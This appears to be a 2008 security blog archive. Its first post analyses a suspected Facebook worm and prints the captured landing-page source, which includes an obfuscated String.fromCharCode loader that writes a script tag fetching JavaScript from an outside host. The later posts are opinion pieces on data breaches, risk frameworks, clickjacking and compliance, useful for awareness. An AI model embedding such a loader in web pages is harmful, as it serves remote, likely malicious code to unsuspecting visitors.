For those of you who have accounts on these social networking sites, you know there is nothing more annoying than SPAM in your mailbox; or worse - some kind of nasty in there. Well, tonight I opened my FaceBook inbox and looked at a very strange-looking message from a friend. What struck me is that it wasn't someone that regularly sends me messages, much less links with cryptic and odd descriptions. Since this caught my attention, I decided to proceed further (using my VMWare sandbox, of course) and decided to document what I think may be a worm of some sort propagating. While I wouldn't normally jump to such a conslusion - I say this because I pinged my friend and asked him if he had sent the message and he had no idea what I was talking about.

Here's what I've been able to find so far.

1. First, let's look at the message itself (screen shot):

So I found this fascinating. First, it appears to be one of those "blanket messages" that would appear normal for most inboxes, except that the two of us generally don't send messages back and forth with cryptic subjects like that... much less such a cryptic body with strange link.

2. Then I decided to fire up my VMWare sandbox and follow the link, for better or worse; from within FaceBook. This is what I found...

I was fascinated that FaceBook was able to determine (through their internal workings) that the site I was about to navigate to was malicious. Interesting! Of course, this wouldn't deter me.

3. Navigating to that malicious site, using FireFox and NoScript on, I got this little gem captured for your viewing pleasure... What's interesting is that 76.x.x.x address there is my IP...

4. I then went and captured the landing page that gave me the above screen shot, the code from that page is here:
{script language="JavaScript"}var PUpage="76001548"; var PUprop="geocities"; {/script}{script language="JavaScript" src=""}{/script}{script language="JavaScript"} var thGetOv=""; var thCanURL=""; var thSpaceId="76001548"; var thIP=""; var thTs="1226206771"; var thCs="6903e27d9a64b4137d7d872f68c57349";{/script}{noscript}{link rel="stylesheet" href=""}{/noscript}{script language="JavaScript" src=""}{/script}
{!-- text above generated by server. PLEASE REMOVE --}
{html}{head}{script}function handleError(){try{window.parent.location=location;}catch(e){}try{;}catch(e){}}window.onerror=handleError;if(window.parent.frames.length}0){if(window.parent.document.body.innerHTML){}}{/script}{script}document.write(String.fromCharCode(96+60-96,96+115-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+32-96,96+115-96,96+114-96,96+99-96,96+61-96,96+39-96,96+104-96,96+116-96,96+116-96,96+112-96,96+58-96,96+47-96,96+47-96,96+108-96,96+111-96,96+115-96,96+116-96,96+97-96,96+114-96,96+116-96,96+46-96,96+105-96,96+110-96,96+102-96,96+111-96,96+47-96,96+106-96,96+115-96,96+47-96,96+106-96,96+115-96,96+46-96,96+106-96,96+115-96,96+39-96,96+62-96,96+60-96,96+47-96,96+115-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+62-96));{/script}{title}Angelina Jolie Fucking Cartoons{/title}{/head}{body}
{!-- following code added by server. PLEASE REMOVE --}
{link href="" rel="stylesheet" type="text/css"}{script language="JavaScript" src=""}{/script}
{!-- preceding code added by server. PLEASE REMOVE --}This is video with you. You're doing something funny there.{/body}{/html}{!-- text below generated by server. PLEASE REMOVE --}{/object}{/layer}{/div}{/span}{/style}{/noscript}{/table}{/script}{/applet}{script language="JavaScript" src=""}{/script}{script language="JavaScript" src=""}{/script}{script language="javascript"}geovisit();{/script}{noscript}{img src="" alt="setstats" border="0" width="1" height="1"}{/noscript}

I highlighted in red the part that I found most interesting. I haven't converted that yet - but will shortly and post that as well. I think it's interesting, at very least.

Here is that string again, in case Blogger doesn't wrap properly.

5. Within h.php I found something else that was interesting. Here that is:
{script language="JavaScript1.1" type="text/javascript"}

document.write('{table title="Phulki is a FREE search engine for Bollywood Music. Take a spin !!" bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw0" onfocus="ss(\'go to \',\'aw0\')" onmouseover="ss(\'go to \',\'aw0\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw0" target="_top" href="*" onfocus="ss(\'go to \',\'aw0\')" onmouseover="return ss(\'go to \',\'aw0\')" onmouseout="cs()"}Enjoy Unlimited Desi Music{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Phulki is a FREE search engine for Bollywood Music. Take a spin !!{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');document.write('{/td}{/tr}{tr}{td height=12}{/td}{/tr}{tr}{td width=172 align=center valign=top}');document.write('{table title="Includes free web page, email & domain forwarding, 24-7 support." bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw1" onfocus="ss(\'go to \',\'aw1\')" onmouseover="ss(\'go to \',\'aw1\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw1" target="_top" href="**" onfocus="ss(\'go to \',\'aw1\')" onmouseover="return ss(\'go to \',\'aw1\')" onmouseout="cs()"}Great Value! Domain{br /}Names from Yahoo!{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Includes free web page, email & domain forwarding, 24-7 support.{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');document.write('{/td}{/tr}{tr}{td height=12}{/td}{/tr}{tr}{td width=172 align=center valign=top}');document.write('{table title="Phulki is a FREE search engine for Bollywood Music. Take a spin !!" bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw2" onfocus="ss(\'go to \',\'aw2\')" onmouseover="ss(\'go to \',\'aw2\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw2" target="_top" href="*" onfocus="ss(\'go to \',\'aw2\')" onmouseover="return ss(\'go to \',\'aw2\')" onmouseout="cs()"}Enjoy Unlimited Desi Music{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Phulki is a FREE search engine for Bollywood Music. Take a spin !!{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');document.write('{/td}{/tr}{tr}{td height=12}{/td}{/tr}{tr}{td width=172 align=center valign=top}');document.write('{table title="Reliable plans w/ free 24-7 support, domain, hosting, and email. $50 setup fee waived." bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw3" onfocus="ss(\'go to \',\'aw3\')" onmouseover="ss(\'go to \',\'aw3\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw3" target="_top" href="**" onfocus="ss(\'go to \',\'aw3\')" onmouseover="return ss(\'go to \',\'aw3\')" onmouseout="cs()"}E-commerce Solutions{br /}from Yahoo!{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Reliable plans w/ free 24-7 support, domain, hosting, and email. $50 setup fee waived.{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');{/script}

So, while I'm doing some more analysis on this (feel free to contact me if you beat me to the punch, and I'll post it/credit you).

Thursday, November 6, 2008

Windows Crash at O'Hair Airport Terminal

In my travels I go through a lot of airports, and every once in a while I run into something that gets my attention and I have to pull out my cell phone camera and snap a picture. Coming home from Detroit tonight... I just had to have this for my "Priceless" collection.

I know, it's not necessarily a "security issue"... but it's a chuckle in a very tough week so bear with me. You'll notice that the offending driver is sysaudio.sys, which is strange because this terminal doesn't actually play any sound... ever that I've heard/seen when it was working.

We really are "Greening" the City of Chicago... wait, what?

Such a waste of a beautiful touch-screen display.

Tuesday, November 4, 2008

Is Nothing Sacred? Data Breach at Texas Lottery


Apparently you're not even safe playing the Lottery lately.

In this article from October 31st (a little dated, I know, but just getting around to reading this) it's apparent that lax data security policies and poor judgment was the cause of this breach. What's astonishing is the complete and utter disregard this employee had for the super-sensitive data (including social security numbers) he "copied and burned to DVD"... what's even more disturbing is his motive:
"I indiscriminately copied all the files from the My DOC folder to a CD/DVD which I carried (to subsequent jobs)"... The employee added he wanted the information "for possible future reference as a programmer at other state agencies."
What possible future reference could he have had from this live data about real people? It continues to amaze me how people just haven't paid attention to the news media and other information outlets discussing how dangerous information like social security numbers is. Did this guy crawl out from under a rock?

Saturday, November 1, 2008

index.asp Server Error

Sometimes, words just don't do a broken index.asp page justice.

What's wrong with this picture?

Friday, October 31, 2008

Risk Rating - When Is Critical Not?

I apologize if you're reading this twice - but it's important enough I wanted to publicize as much as possible.

Over on my other HP blog, I posted an article on Risk Ratings, and the notion that critical isn't always critical - but "tools" just don't do risk ratings justice. I'm looking for feedback, serious thoughts, and volunteers to help me take this research to the next level.

Please read:
Following the White Rabbit:

Thank you.

Tuesday, October 28, 2008

Framework for Realistically Addressing IT Risk (Security Issues)

Better security is often the result of a poorly-timed disaster... -me
Man is an impulsive creature... We tend to try and solve problems before we fully understand their nature.

Once you accept that as truth, you can begin to realize why tIT Security and Risk Management is in such a sorry state, and why we're perpetually bailing water from a sinking ship. Risk is a difficult concept to understand, I get that; it took me arguably 8 years into my IT career to fully grasp that risk is a "gray" area and never binary. For many "IT Security" practitioners I've worked with over the years this is where things go south.

After thinking about the causes for poor risk mitigation and security practices in today's business world, I've channeled my efforts to developing a way lay out the problem-solving process in a way that makes sense, and can get us closer to the zero-horizon than we've previously been able to come to. Here's what I have been able to come up with... keep in mind it's still a work-in-progress but I'm putting it out there so as to solicit responses and maybe help me refine this process. Think of it as a ... practical guide to security/risk problems.

These are the steps that I feel one (or many) should go through to resolve any clear and present danger facing an IT Security/Risk group...

  1. Admit there is a problem - Take your head out of the sand, admit there are issues that need to be addressed and begin to try and gather the "big picture" around the existence of these issues. Just admitting there is a problem is the first step, but often the hardest.
  2. Implement a tactical stop-gap - Stop the bleeding; forget trying to wrap your head fully around the problem... just find a way to stop the bleeding short-term while you work to resolve long-term.
  3. Understand the nature of the problem - Now that you've got the wound triaged, look deeper and wider into the actual nature of the issue. Look beyond IT, "think outside the box", ask for other input from people who may have a different perspective.
  4. Admit the resultant risk will never be zero (full resolution) - You will never bring the risk equation all the way down to zero; never going to happen. I think it's paramount that those attempting to mitigate the risk understand this.
  5. Resolve to work towards a realistic strategic solution - Forget the perfect Utopia-like resolution where everything is perfect (see step 4)... set realistic goals for mitigation, and resolve to get there in a sane manner. Put this on paper, tack it somewhere everyone will see it.
  6. Provide real effort to resolve the problem holistically - In order to resolve a problem dealing with real-world risks, real-world efforts must be made. Think beyond your walls, identify all possible permutations of this risk and provide effort to resolve this holistic problem. This costs time, money, and resources. Be prepared for those costs, allocate them in advance or you'll doom yourself to fail.
  7. Implement the strategic resolution in good-faith - Once there is a resolution it'll take real effort (see #6) by your business to implement this resolution. Make sure you have solid backing from the business... not just IT.
  8. Continue to provide feedback for the future - Risk is never solved with a point-in-time approach. Risk evolves, morphs, and changes the rules just when you think you're safe. You must continue to re-visit to make sure yesterday's strategic resolution still works today.

There you have it. Hopefully this ground-work will help build a more solid foundation for risk-related problem solving.

I welcome your input, feedback, criticism and everything else you may have.
Just be constructive.

Monday, October 27, 2008

T-Mobile Android Has a Vulnerability

Stop the presses. Call your mother. Google Android Mobile (a la T-Mobile G1) has a security issue you say?

Good news first...
  • Google wrote Android with security in mind (we'd like to think) and its applications run within an isolated "sandbox" type environment
  • So... trojan'ing the browser (which is WebKit-based) means you don't get acces to the entire system
  • The wording from the body that discovered the flaw (Independent Security Evaluators, ISE) indicates that there is an existing fix for the flaw (which exists in one of the many open-source packages used)
Now the bad news...
Since most people use the browser on their phone for nearly everything, this means that you can't trust the browser in your phone - thus defeating a vast majority of the functionality people crave.
Perhaps it was the rush to market, or perhaps it was the lack of attention to security - I won't speculate; what I can tell you is that it's obvious security researchers couldn't wait to find a flaw in Android... it sure didn't take long.
Does it mean that you shouldn't buy one? Probably not.
Does it mean that Google's security is bad? Probably not.
Does this mean that Android is just another piece of consumer-ized gadgetry? Absolutely.

Friday, October 24, 2008

FDIC Pushes Back ID Theft Red Flags Rule Enforcement

That's right.

As reported by in an article posted today, the FDIC is delaying enforcement of a rule that has been on the books for quite some time because entities covered by this regulation aren't in compliance yet. Although the FDIC initially published a notice to this rule on November 9th, 2007 (enforcing the Fair and Accurate Credit Transactions Act of 2003), and the rule went into effect January 1st, 2008, with compliance required by November 1st, 2008 - this is now being pushed back 6 months because the the "we didn't know we needed to comply, give us more time" argument was thrown down. How absolutely irrisponsible!
"...FTC observers saw that many industry segments were unaware of the
compliance date..."

Isn't that a little rediculous? The FDIC attempts to explain itself here, in this release... I understand that it's a good practice to give affected parties ample time to comply before bringing down the hammer (I would say 11 months is fair, wouldn't you?), and according to some of the analysts closer to this issue than I this rule-enforcement is broadening those entities covered under the 2003 regulation - I still can't see a reason why a reasonable regulations and compliance officer wouldn't figure this out.

I will admit that this goes beyond banks to credit unions, car dealers, and public utilities - basically anyone that handles your credit/personal information. I will further take the stance that this reglation falls under the "It's about da** time" argument, and delaying enforcement is irrisponsible at best, and criminally negligent at worst.

Let's analyze what this regulation requires - for those that aren't familiar with it...
"In designing its Program, a financial institution or creditor may incorporate,
as appropriate, its existing policies, procedures, and other arrangements that
control reasonably foreseeable risks to customers or to the safety and soundness
of the financial institution or creditor from identity theft." (Source here)

  • This regulation requires an institution to establish a "Red Flag Program" to have a written policy for detecting identity theft/fraud via "red flag" activities (high-risk activities) which is then enforced within the institution
  • This program is based off of the institution's experience with identity theft (from past incidents?) - which is an interesting requirement...
  • The Program framework requires the use of historic data on identity theft to be pro-active in preventing new and mitigating existing identity theft and fraud
  • More information on the framework and requirements of the program available here.
  • The actual regulation language available here.

Some soapbox commentary:

{Steps on soapbox}
If you are an institution which typically deals (or has dealt with in the past) identity theft or identity-fraud-related activities... is boggles the mind that you would not have a program of "Red Flags" to identify when/how this is happening. I suspect this is a sad commentary on the state of identity theft... it's running so rampant that there are now specific regulations from the Federal Goverment (FDIC) which are forcing businesses and institutions to implement programs to identify and precent identity theft and credit fraud. I believe it is a further sad commentary that the FDIC has "relaxed" the enforcement date for businesses based (no doubt) on some lobbying efforts from groups which simply don't feel like complying. Look folks, programs like this don't cost incredible amounts of money to implement. They should be fundamental to all businesses models, not just banks and credit cards companies and retailers.

I firmly believe that institutions which do *not* have these types of programs (are non-compliant) after the May 1st enforcement date which have incidents of identity theft and fraud should be fined and sued for negligence by anyone who has their identity compromised through these entities. It's black and white here... there is no gray-area. Ordinarily I wouldn't say this but you're either compliant or not. You are either responsible with people's information and have a program in place to detect and root out identity theft and fraud - or you're negligent and should be severely punnished.
{steps off soapbox}

Sunday, October 19, 2008

Quantum Crypto - Schneier Commentary in Wired

While ordinarily I have to admit I find some of Bruce's stuff a bit... harsh and pointy, I read his recent commentary on Quantum Cryptography in Wired and found myself nodding my head in agreement.

I don't think it's a secret I tend to be a realist when it comes to security; and often find myself arguing against the concept of "piling on" when there are much weaker links in the chain. Bruce's assertion that the level of extra security gain from quantum crypto (the assurance that no one is listening in) is great but we have bigger problems. Well, no kidding!

I can't remember whom I was talking to about this at OWASP '08 (I think it was RSnake... I'm fairly sure) but the other person's assertion was that encrypting/signing stuff is inherently broken for most applications. Interesting huh? I'm fairly certain it was RSnake (now that I think about it) that said this, referencing MITM (man-in-the-middle) attacks. I include my PGP key in my signature on my personal email - but how do you really know it's coming from me and it wasn't altered along the way? Did I give it to you in person, and did you verify it was really me? See, this builds upon the interesting basic question of how much trust do you have in any given system. Do you trust the PGP key-maintenance system? And if you do, why? Think it over for a minute.

Cryptography really depends on the mechanism of distribution of the key(s), and how "trusted" that mechanism is. Within the ranks of the DoD, I imagine but don't have any first-hand knowledge, they've probably built their own key management system that is ~100% trusted (or darn near 100%). But I digress.

Quantum crypto is a wonderful theoretical concept - but another one of those things that has very little real application beyond academia. Bummer... neat idea though.

Sunday, October 12, 2008

ClickJacking - A Perspective Problem

While ClickJacking is the latest apocalyptic threat in IT Security, I wanted to point out something yet again, as I did back when Dan Kaminsky reported his DNS flaw and it because catachlysmic for its 15 minutes of fame.

I've been reading interviews, insights, write-ups and blogs on ClickJacking and I've had so many discussions with some of you my head spins trying to remember it all but something I saw a couple of days (weeks maybe?) ago is staying with me so I looked it back up and wanted to briefly talk about it.

This quote from Jeremiah Grossman, is disturbing.
"Recently we're [Grossman & RSnake] told we’ve been told that its been known by the browser vendors since 2002." [CGI Security interview, 10/5/08]

Why is this disturbing, do you ask? Think about it. If this statement isn't stretching truth (and I haven't found Jeremiah to be a sensationalist) then this has been an open, the-sky-is-falling-drop-everything issue for ~6 years. Not 6 days, months but YEARS. So the question we have to ask ourselves [but already know the answer to] is why in the world is it still an issue in 2008?

I'd love to know a few things:
  • Why did we [security professionals] not freak out about this in 2002?
  • Why haven't IE7+ and Firefox (at least?) resolved this issue dead?
  • Why hasn't the standards body [the W3] taken this up as a standards issue?
The answer is simple, so painfully simple. Functionality wins over "vulnerability" every time.

Now, if you'll excuse me I'm going to go cancel my Internet connection, put a sledge-hammer to my computers and walk around aimlessly.

EDIT: Sun. Oct 12, 2:02pm CDT

I just read Jeremiah's comment, and then started reading the link he posted to the Bugzilla post on the bug Jesse Ruderman posted first in 2002, and Robert O'Callahan's (from Mozilla) continued stance against his views. I think it is important for everyone interested in security to read that thread to really understand what we [security professionals] are up against in the world of technology. Understandably functionalit has always been, and will always be the antithesis of security.

There is a much, much deeper conversation to be had here. If any of you are going to InfoSec World in Orlando in March, I'd like to get a "thought group" on this topic together. Email me directly and we'll put it together. I'm not saying we're going to solve anything - but maybe come up wth a better way to think this through as a community.

Friday, October 10, 2008

Closing thoughts for a Friday

Hey folks - just some closing thoughts for a Friday. Hope everyone's had a decent week, and by now you've got a cold one in hand. Here are some thoughts I had as this week tails off into another weekend.
  1. Has anyone paid attention to the sheer stupidity of public services lately with regard to data loss/theft? I mean, seriously! I have a Google Alerts "as it happens" notification set up for "security breach" +data and if you haven't paid attention there have been an absolutely stupifyingly overwhelming amount of data breaches that involve our government or its entities in some way. Foreign governments, schools, social services - all losing laptops, getting hacked and the toll is mounting. Last count we're somewhere in the 2MM+ records lost in the past few weeks. When will the carnage stop? (More on this in a future post as I have some serious research to do. If you'd like to help ping me directly.)
  2. Cloud computing... so I was talking to a colleague and friend over at PureWire, and he is absolutely religiously convinced that in a short period of time (and I quote) ... "Everyone will be doing it [in-the-cloud security], it's inevitable". I tend to disagree, in fact - I think "In the Cloud" security is a bit of a scary proposition - but I'm hoping to have a 20-questions type of interview posted here on this blog with the folks that are running the gears over at PureWire.
  3. I'm finally going to get around to posting that interview I did with a "semi-ehtical-DarkSEO dude" in the next few weeks when thing settle down at the ranch a little. It's been sitting on my desktop, and everyone's been killing me to publish it - problem is - it's huge (10+ pages of good info, I think). Does anyone know where I can post it? I'll post part of the interview to the blog here as a teaser, and the rest to a site somewhere, as a PDF/paper. Your suggestions are welcome.

Data Security in Financial Crisis

If you've not looked up from your screen in a while - there is a major world-wide recession underway. When you look around and see a company like Lehman Brothers basically out of business, the first instinct is to panic because the financial markets are clearly crumbling.

Rich Mogull's write up on entitled "Impact of the Economic Crisis on Security" was definitely worth a read, if you've not gotten a chance to read it yet. After you read Rich's blog entry... think about this: what's happening with all the data that's being "liquidated"? Scary isn't it. Those behemoths of Wall Street hold terabytes of information - PIA (personally identifiable information) of all types.

Once again I think we're right to rant and rave about how those CEOs should be behind bars, or worse - but let's consider the data. The data, or what's happening (or going to happen) to it is what's scarring me to death. I actually have data, my personal information, at some of those failed firms all over the place. When they're liquidated, or parted off and sold... is there a governing body somewhere that's keeping track and making sure disks are wiped clean, digitally shredded so they can't be used in fraud or identity thefts? All the government oversight we're proposing today, and the $700Bn (that number boggles my mind) "bailout" and not a single mention of information management anywhere in there.

I think there is a much deeper crisis here than just collapsing financials - because like it or not that ship will list and right itself, eventually (likely at the expense of you and I, the taxpayers) but the data that's mis-handled, lost, stolen and forgotten about... who's going to bail ME out when my identity is stolen as a result?

Anyway... thought I'd just share what's on my mind. Feel free to reply, comment and rant with me.

Tuesday, September 30, 2008

Getting Hacked: Arrogance or Ignorance?

Hi readers, I read a fair amount of blogs and occasionally find something I just feel compelled to pass along. This time though, I came across an article that was too interesting not to share, but unfortunately highlighted (and I think this was unintentionally) something that we [all of us] have badly overlooked.

First, the article. "News of Frauds" is a blog maintained by Piyush Sood. Yesterday he cross-posted an article from written originally by Corinne Iozzio on the most "mysterious" cyber-crimes of all time. While I may not agree with Corinne's assessment with the importance/mysteriousness of these crimes - I think she pointed out a little gem.

If you scroll down to the "Supermarket Security Breech" you'll notice an interesting quote.

"Chain reps and security experts are still unclear as to how the criminals gained access to the system; the 2005 T.J.Maxx breach took advantage of a vulnerability in the chain's wireless credit transfer system, but Hannaford and Sweetbay do not use wireless transfers of any sort."

This quote fascinated me instantly. Of course they may not have known about any wireless - that's kind of the point isn't it? How many companies are willing to say, on the record, "no we do not have wireless" only to get hacked through some open access point hidden under someone's desk or in a conference room to 'share network access'. It's a sad commentary, I think.

Saying "we have no wireless" and actually having a policy that prohibits people from hooking up access points randomly are two entirely different things. Oddly enough, most companies simply say "we don't allow wireless" and then wonder how it is they could have possibly gotten hacked when their network is so air-tight.

I can't stress this enough. If you don't want something on your network - make a policy against it and be ready to enforce that policy. Otherwise... expect to be hacked. Or at least be ready to have to explain why you're not ready.